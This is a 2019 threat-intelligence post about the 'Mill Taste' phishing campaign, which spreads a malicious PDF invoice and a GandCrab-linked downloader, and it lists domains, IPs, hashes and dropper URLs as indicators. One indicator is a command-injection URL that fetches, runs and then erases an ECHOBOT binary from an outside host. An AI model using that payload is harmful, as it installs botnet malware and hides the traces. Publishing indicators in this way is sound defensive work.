The “Mill Taste” Campaign

ByRJG

October 28, 2019

An active phishing campaign is being propagated from a Spanish-themed domain name that alludes to El Molino Sabor (in English: “Mill Taste”) and shows a close-up of a Sweet Potato or Yam on the landing page of the website.  The social engineering approach is an email from an “Accounting Manager” by the name of “Melissa Henry” who is sending a “copy” of a paid invoice.  In fact, it has attached a PDF and is coming with the subject line: Paid Invoice TT Copy. Based on my link analysis the PDF is infected with malware which will be described below.

Phishing Campaign Cyber Observables

The phishing domain is:  elmolinosabor[.]com

The phishing IP is:  146.112.61[.]107

Recent DNS History

The threat actor appears to have begun building his infrastructure on February 1, 2019 using an admin panel labeled “l5fa7189.justinstalledpanel.com” at IP: 94.102.60.165.  From the DNS history tracked by [redacted] it appears that the initial test run of the malicious infrastructure was on June 5th and 8th from www1-royalbank[.]cc and www1royalbank-petrocanada[.]com, respectively.

The same Splash page for all three of these events is showing as the same ‘Welcome!’ placeholder.

According to the [redacted] tool the autonomous system network for the above noted IP is:  AS202425 which is exhibiting multiple security issues including:

  • Route leaks (4)
  • Hijacks (111)
  • DDoS Amplifiers (326)
  • Static Loops (5)

Malware Artifacts

The most recently seen malware artifact as documented on [redacted] was the following WIN32 executable:  scaalqtw[.]exe (Hash: 533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9).As of August 15, 2019, 51 of 70 antivirus research firms have identified this malware as malicious including CheckPoint, CrowdStrike, FireEye, F-Secure, Kaspersky, Malwarebytes, McAfee, Microsoft, Panda, Palo Alto Networks, Sophos, TrendMicro, and Symantec. It is being characterized as a “heuristic”  “downloader” and a “Grandcrab.AF” Trojan.

As the viewer can see from the above screenshot the executable file is beaconing out to a Seychelles site and a .zz site (the question mark [?]) shown on the node graph representation. There are numerous “communicating” and referring nodes also associated with the .zz node identified by [redacted] as Hanover Hospital.  The Cyber Observables for this campaign are given below.

Contact CTIN for more information and the complete list of Cyber Observables of the Mill Taste Campaign.

Dropper Site Cyber Observables

533a8297086b4d014c1c65fcfccfdaf906890016f08d430ed0e1ebb3a4957fe9,
94.102.60.165,
10.0.2.15,
http://94.102.60.165/log/adm.php,
http://94.102.60.165/check.dll,
http://94.102.60.165/mail.dll,
http://94.102.60.165/sun/check.dll,
http://94.102.60.165/sea/indexh.php?&1001=2&99=15&f1=ssleay32.dll,
http://94.102.60.165/sun/indexh.php?&1001=2&99=15&f1=ssleay32.dll,
http://94.102.60.165/sun/indexh.php?&1001=2&99=15&f1=libeay32.dll,
http://10.0.2.15:1041%s/,
http://94.102.60.165/sun/indexh.php?&1001=2&99=0&f1=7z.dll,
http://94.102.60.165/sun/indexh.php?&1001=2,
http://94.102.60.165/sea/indexh.php?&1001=4&req=3&

Communicating Nodes Cyber Observables

12c7e0c472a50b29530a0417659d758079d7cfa9557ea224d95ea92745cb0ac3,
5f4ec26b34a5dcb26590128a6c99b8391f00cb7fcba301a25291b33bf27b65b3,
d691b01806cc91407f560e4a1ee2bad5d817cab98989f7e7353dc8c0e1239c48,
a1510186f29e0c0b5e0c01a986ecb4e16938be0fba3c2f19d81374f4130317cf,
2e14332b9b4c8c1b36dbd6515ac7e5212d0e634792415feeb8eb25134b09ca0d,
adb17860802b2a9e5dd10e603b4034142ee35a00474f7a13b6474f24be880510,
723d9a74f82c1eeae07e4ce8bb2580b8b60673311d04384284809f96e5cb2d6e,
1e12793127168b505dac74e0ba56e268afaf8f9cc819c70e09bd84583a7fdd6f,
cdac6989937bd374e5a4c7e58a91f68c0bb409c1d58034a5c8670144bde6d762,
7fe7a59e34d6c190309219d69fe11900daec7d82e0f6de36716d5068806fc814,
w1-runnerscaleoutcitusgroup637078724425217418.postgres.database.azure.com,
runnercitus-eastus-348e85ea-4.postgres.database.azure.com,
w0-runnerscaleoutcitusgroup637078580419087604.postgres.database.azure.com,
runnercitus-eastus-1be96d43-3.postgres.database.azure.com,
w1-runnerscaleoutcitusgroup637078436412997021.postgres.database.azure.com,
pantos-msk.d4honm.c2.kafka.ap-northeast-2.amazonaws.com,
runnercitus-eastus-d6febfab-2.postgres.database.azure.com,
w1-runnerscaleoutcitusgroup637078292406906669.postgres.database.azure.com,
cfnlaunchpadcanarytes.ydze9e.c4.kafka.eu-north-1.amazonaws.com,
w0-runnerscaleoutcitusgroup637078148400702433.postgres.database.azure.com,
http://10.0.2.15/bot/config.bin,
http://10.0.2.15:1037/click/dtype=stred/pid=12/cid=72435/path=%25s/*,
http://yuemahui.f3322.org/,
http://10.0.2.15/repository/annotate?rev=cd /tmp; wget http://31.13.195.251/ECHO/ECHOBOT.x86; chmod 777 ECHOBOT.x86; ./ECHOBOT.x86; rm -rf ECHOBOT.x86; history -c,
http://gxga.3322.org/,
http://jjteng.3322.org/,
http://chenyunfei.3322.org/,
https://yuemahui.f3322.org/,
https://populire.servecounterstrike.com/,
http://populire.servecounterstrike.com/,
7d7c9c2deb475c3e7c77f5b9fff03dc6bddced25115232b68112acfead57c2a1,
0439751586a1856bc8feb48535c4055f51835b679e386d083a2c98d47181218f,
b2a9f53b52998f213675a332df13f0e66800277dde678c42c446f18bd6424798,
37269f57bad0f2d954f2aa2892b89bbad10278e84e035b4a4db78f1c6a408d8e,
47a309f76a12f39d77f155f5e548ac10126db993c1f619c6810ca71793f77734,
de9d727e15ea3ddbe9eb3a49ae083e5cca23f9fbf8cdd5d76021e3cea37cb2af,
5d393cdd0d4c8813f9c86121d6279d85232316bbe993ea1fb6f8f4471efb5d8a,
6ab990ea783a1e28783b79d123525d434f93b7214014d0cd8071889f82108562,
dda022507ffdcb2eb82534a3224f0862eb76faaacedc91b3fb1b06fcfc35c10c,
7c99c2bd71448f2bb930772c4acfeb534472817d9e1493059eebea66b493fcb7

author avatar
RJG CTIN President & Co-Founder
Jane Ginn As the co-founder of the Cyber Threat Intelligence Network (CTIN), a consultancy with partners in Europe, Ms. Ginn has been pivotal in the development of the STIX international standard for modeling and sharing threat intelligence. She currently serves as the Secretary of the OASIS Threat Actor Context Technical Committee, contributing to the creation of a semantic technology ontology for cyber threat actor analysis. Her efforts in this area and her earlier work with the Cyber Threat Intelligence (CTI) TC earned her the 2020 Distinguished Contributor award from OASIS. In public service, she advised five Secretaries of the US Department of Commerce on international trade issues from 1994 to 2001 and served on the Washington District Export Council for five years. In the EU, she was an appointed member of the European Union's ENISA Threat Landscape Stakeholders' Group for four years. A world traveler and amateur photojournalist, she has visited over 50 countries, further enriching her global outlook and professional insights. Follow me on LinkedIn: www.linkedin.com/comm/mynetwork/discovery-see-all?usecase=PEOPLE_FOLLOWS&followMember=janeginn
Translate »